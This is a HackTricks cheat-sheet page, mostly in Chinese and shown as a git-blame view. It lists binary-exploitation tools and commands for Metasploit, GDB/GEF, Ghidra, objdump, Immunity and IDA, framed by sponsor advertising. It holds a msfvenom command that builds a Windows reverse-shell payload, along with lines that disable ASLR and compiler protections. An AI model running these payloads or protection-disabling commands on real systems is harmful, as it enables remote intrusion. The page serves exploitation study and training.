hacktricks/exploiting/tools/README.md

250 lines
11 KiB
Markdown
Raw Normal View History

2022-04-28 16:01:33 +00:00
<details>
2023-08-03 19:12:22 +00:00
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks云 ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 推特 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
2022-04-28 16:01:33 +00:00
2023-08-03 19:12:22 +00:00
- 你在一家**网络安全公司**工作吗你想在HackTricks中看到你的**公司广告**吗?或者你想获得**PEASS的最新版本或下载HackTricks的PDF**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
2022-04-28 16:01:33 +00:00
2023-08-03 19:12:22 +00:00
- 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)
2022-04-28 16:01:33 +00:00
2023-08-03 19:12:22 +00:00
- 获得[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
2022-04-28 16:01:33 +00:00
2023-08-03 19:12:22 +00:00
- **加入** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram群组**](https://t.me/peass) 或 **关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
2022-04-28 16:01:33 +00:00
2023-08-03 19:12:22 +00:00
- **通过向[hacktricks repo](https://github.com/carlospolop/hacktricks)和[hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)提交PR来分享你的黑客技巧**。
2022-04-28 16:01:33 +00:00
</details>
2022-05-01 16:32:23 +00:00
# Metasploit
```
pattern_create.rb -l 3000 #Length
pattern_offset.rb -l 3000 -q 5f97d534 #Search offset
nasm_shell.rb
nasm> jmp esp #Get opcodes
msfelfscan -j esi /opt/fusion/bin/level01
```
2022-05-01 16:32:23 +00:00
## Shellcodes
2023-08-03 19:12:22 +00:00
Shellcode是一段用于利用软件漏洞的机器码。它通常用于利用缓冲区溢出等漏洞以在目标系统上执行恶意代码。Shellcode的目标是获取系统访问权限从而使黑客能够执行各种操作如远程控制、文件访问和系统信息收集。
Shellcode通常以二进制形式存在并且必须与特定的操作系统和架构兼容。因此编写Shellcode时需要考虑目标系统的操作系统类型如Windows、Linux或macOS和架构如x86、x64或ARM
Shellcode的编写可以使用汇编语言或高级语言如C或C++。一些常见的Shellcode编写工具包括NASM、GCC和LLVM。
在利用漏洞时Shellcode通常通过将其注入到受攻击的程序中来执行。这可以通过多种方式实现如利用缓冲区溢出、格式化字符串漏洞或使用特定的漏洞利用工具。
Shellcode的编写是黑客和安全研究人员的重要技能之一。了解Shellcode的工作原理和编写方法可以帮助他们更好地理解和防御各种漏洞攻击。
```
msfvenom /p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> [EXITFUNC=thread] [-e x86/shikata_ga_nai] -b "\x00\x0a\x0d" -f c
```
2022-05-01 16:32:23 +00:00
# GDB
2023-08-03 19:12:22 +00:00
## 安装
2023-08-03 19:12:22 +00:00
To install GDB, you can use the following command:
```bash
sudo apt-get install gdb
```
2023-08-03 19:12:22 +00:00
Once the installation is complete, you can verify the installation by running the following command:
```bash
gdb --version
2021-09-24 22:54:24 +00:00
```
2023-08-03 19:12:22 +00:00
This will display the version of GDB installed on your system.
```
apt-get install gdb
```
## 参数
2023-08-03 19:12:22 +00:00
**-q** --> 不显示横幅\
**-x \<file>** --> 从此处自动执行GDB指令\
**-p \<pid>** --> 附加到进程
2023-08-03 19:12:22 +00:00
### 指令
2023-08-03 19:12:22 +00:00
\> **disassemble main** --> 反汇编函数\
\> **disassemble 0x12345678**\
\> **set disassembly-flavor intel**\
2023-08-03 19:12:22 +00:00
\> **set follow-fork-mode child/parent** --> 跟踪创建的进程\
\> **p system** --> 查找system函数的地址\
\> **help**\
\> **quit**
2023-08-03 19:12:22 +00:00
\> **br func** --> 在函数中添加断点\
\> **br \*func+23**\
\> **br \*0x12345678**\
2023-08-03 19:12:22 +00:00
**> del NUM** --> 删除指定数量的断点\
\> **watch EXPRESSION** --> 如果值发生变化,则中断
**> run** --> 执行\
**> start** --> 在main函数中开始并中断\
\> **n/next** --> 执行下一条指令(不进入函数内部)\
\> **s/step** --> 执行下一条指令\
\> **c/continue** --> 继续执行直到下一个断点
\> **set $eip = 0x12345678** --> 更改$eip的值\
\> **info functions** --> 函数信息\
\> **info functions func** --> 函数的信息\
\> **info registers** --> 寄存器的值\
\> **bt** --> 栈\
\> **bt full** --> 详细的栈信息
\> **print variable**\
2023-08-03 19:12:22 +00:00
\> **print 0x87654321 - 0x12345678** --> 计算\
\> **examine o/x/u/t/i/s dir\_mem/reg/puntero** --> 以八进制/十六进制/十进制/二进制/指令/ASCII显示内容
2021-11-30 16:46:07 +00:00
* **x/o 0xDir\_hex**
2023-08-03 19:12:22 +00:00
* **x/2x $eip** --> 从EIP中获取2个字
2022-05-01 16:32:23 +00:00
* **x/2x $eip -4** --> $eip - 4
2023-08-03 19:12:22 +00:00
* **x/8xb $eip** --> 8个字节b-> 字节, h-> 2字节, w-> 4字节, g-> 8字节
* **i r eip** --> $eip的值
* **x/w pointer** --> 指针的值
* **x/s pointer** --> 指针指向的字符串
* **x/xw \&pointer** --> 指针所在的地址
* **x/i $eip** —> EIP的指令
2022-05-01 16:32:23 +00:00
## [GEF](https://github.com/hugsy/gef)
2021-09-24 22:54:24 +00:00
```bash
checksec #Check protections
2021-09-24 22:58:16 +00:00
p system #Find system function address
2021-09-24 22:54:24 +00:00
search-pattern "/bin/sh" #Search in the process memory
2021-09-24 22:58:16 +00:00
vmmap #Get memory mappings
2021-09-24 22:54:24 +00:00
#Shellcode
shellcode search x86 #Search shellcodes
shellcode get 61 #Download shellcode number 61
2021-09-24 22:54:24 +00:00
#Patterns
pattern create 200 #Generate length 200 pattern
pattern search "avaaawaa" #Search for the offset of that substring
pattern search $rsp #Search the offset given the content of $rsp
#Another way to get the offset of to the RIP
1- Put a bp after the function that overwrites the RIP and send a ppatern to ovwerwrite it
2- ef➤ i f
Stack level 0, frame at 0x7fffffffddd0:
2023-08-03 19:12:22 +00:00
rip = 0x400cd3; saved rip = 0x6261617762616176
called by frame at 0x7fffffffddd8
Arglist at 0x7fffffffdcf8, args:
Locals at 0x7fffffffdcf8, Previous frame's sp is 0x7fffffffddd0
Saved registers:
rbp at 0x7fffffffddc0, rip at 0x7fffffffddc8
gef➤ pattern search 0x6261617762616176
[+] Searching for '0x6261617762616176'
[+] Found at offset 184 (little-endian search) likely
2021-09-24 22:54:24 +00:00
```
2023-08-03 19:12:22 +00:00
## 技巧
2023-08-03 19:12:22 +00:00
### GDB相同的地址
2023-08-03 19:12:22 +00:00
在调试过程中GDB的地址与执行二进制文件时使用的地址**略有不同**。您可以通过以下方式使GDB具有相同的地址
* `unset env LINES`
* `unset env COLUMNS`
2023-08-03 19:12:22 +00:00
* `set env _=<path>` _将二进制文件的绝对路径放在这里_
* 使用相同的绝对路径利用二进制文件
* 在使用GDB和利用二进制文件时`PWD`和`OLDPWD`必须相同
2023-08-03 19:12:22 +00:00
### 回溯以查找调用的函数
2023-08-03 19:12:22 +00:00
当您有一个**静态链接的二进制文件**时,所有的函数都属于二进制文件(而不是外部库)。在这种情况下,很难**确定二进制文件遵循的流程,例如要求用户输入**。\
您可以通过使用**gdb**运行二进制文件,直到要求输入时停止它,然后使用**`bt`****回溯**)命令查看调用的函数来轻松确定此流程:
```
gef➤ bt
#0 0x00000000004498ae in ?? ()
#1 0x0000000000400b90 in ?? ()
#2 0x0000000000400c1d in ?? ()
#3 0x00000000004011a9 in ?? ()
#4 0x0000000000400a5a in ?? ()
```
2023-08-03 19:12:22 +00:00
## GDB服务器
2023-08-03 19:12:22 +00:00
`gdbserver --multi 0.0.0.0:23947`在IDA中您需要在Linux机器和Windows机器中填写可执行文件的绝对路径
2022-05-01 16:32:23 +00:00
# Ghidra
2023-08-03 19:12:22 +00:00
## 查找堆栈偏移
2023-08-03 19:12:22 +00:00
**Ghidra**非常有用,可以通过有关本地变量位置的信息找到**缓冲区溢出的偏移量**。\
例如,在下面的示例中,`local_bc`中的缓冲区溢出表示您需要一个偏移量为`0xbc`。此外,如果`local_10`是一个canary cookie表示从`local_bc`覆盖它的偏移量为`0xac`。\
_请记住RIP保存的第一个0x08属于RBP。_
![](<../../.gitbook/assets/image (616).png>)
2022-05-01 16:32:23 +00:00
# GCC
2023-08-03 19:12:22 +00:00
**gcc -fno-stack-protector -D\_FORTIFY\_SOURCE=0 -z norelro -z execstack 1.2.c -o 1.2** --> 编译时去除保护\
**-o** --> 输出\
**-g** --> 保存代码GDB将能够查看它\
**echo 0 > /proc/sys/kernel/randomize\_va\_space** --> 在Linux中禁用ASLR
2023-08-03 19:12:22 +00:00
**编译shellcode**\
**nasm -f elf assembly.asm** --> 返回“.o”\
**ld assembly.o -o shellcodeout** --> 可执行文件
2022-05-01 16:32:23 +00:00
# Objdump
2023-08-03 19:12:22 +00:00
**-d** --> 反汇编可执行文件的各个部分查看编译后的shellcode的操作码查找ROP Gadgets查找函数地址...\
**-Mintel** --> **Intel**语法\
**-t** --> **符号**表\
**-D** --> **反汇编全部**(静态变量的地址)\
**-s -j .dtors** --> dtors部分\
**-s -j .got** --> got部分\
\-D -s -j .plt --> **plt**部分**反编译**\
**-TR** --> **重定位**\
**ojdump -t --dynamic-relo ./exec | grep puts** --> 修改GOT中的"puts"的地址\
**objdump -D ./exec | grep "VAR\_NAME"** --> 静态变量的地址这些存储在DATA部分
2022-05-01 16:32:23 +00:00
# Core dumps
2023-08-03 19:12:22 +00:00
1. 在启动程序之前运行`ulimit -c unlimited`
2. 运行`sudo sysctl -w kernel.core_pattern=/tmp/core-%e.%p.%h.%t`
3. 运行`sudo gdb --core=\<path/core> --quiet`
2023-08-03 19:12:22 +00:00
# 更多
2023-08-03 19:12:22 +00:00
**ldd executable | grep libc.so.6** --> 地址如果启用ASLR则每次都会更改\
**for i in \`seq 0 20\`; do ldd \<Ejecutable> | grep libc; done** --> 循环查看地址是否经常更改\
**readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system** --> "system"的偏移量\
**strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh** --> "/bin/sh"的偏移量
2023-08-03 19:12:22 +00:00
**strace executable** --> 可执行文件调用的函数\
**rabin2 -i ejecutable -->** 所有函数的地址
2022-05-01 16:32:23 +00:00
# **Inmunity debugger**
2021-09-24 22:54:24 +00:00
```bash
!mona modules #Get protections, look for all false except last one (Dll of SO)
!mona find -s "\xff\xe4" -m name_unsecure.dll #Search for opcodes insie dll space (JMP ESP)
```
2022-05-01 16:32:23 +00:00
# IDA
2023-08-03 19:12:22 +00:00
## 在远程 Linux 上进行调试
2023-08-03 19:12:22 +00:00
在 IDA 文件夹中,您可以找到用于在 Linux 上调试二进制文件的可执行文件。要这样做,请将 _linux\_server_ 或 _linux\_server64_ 可执行文件移动到 Linux 服务器中,并在包含二进制文件的文件夹中运行它:
```
./linux_server64 -Ppass
```
2023-08-03 19:12:22 +00:00
然后配置调试器调试器远程Linux-> 进程选项...
![](<../../.gitbook/assets/image (101).png>)
2022-04-28 16:01:33 +00:00
2022-05-01 16:32:23 +00:00
2022-04-28 16:01:33 +00:00
<details>
2023-08-03 19:12:22 +00:00
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks云 ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
2022-04-28 16:01:33 +00:00
2023-08-03 19:12:22 +00:00
- 你在一家**网络安全公司**工作吗想要在HackTricks中看到你的**公司广告**吗?或者你想要**获取PEASS的最新版本或下载PDF格式的HackTricks**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
2022-04-28 16:01:33 +00:00
2023-08-03 19:12:22 +00:00
- 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品——[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
2022-04-28 16:01:33 +00:00
2023-08-03 19:12:22 +00:00
- 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
2022-04-28 16:01:33 +00:00
2023-08-03 19:12:22 +00:00
- **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**电报群组**](https://t.me/peass),或者**关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
2022-04-28 16:01:33 +00:00
2023-08-03 19:12:22 +00:00
- **通过向[hacktricks仓库](https://github.com/carlospolop/hacktricks)和[hacktricks-cloud仓库](https://github.com/carlospolop/hacktricks-cloud)提交PR来分享你的黑客技巧**。
2022-04-28 16:01:33 +00:00
</details>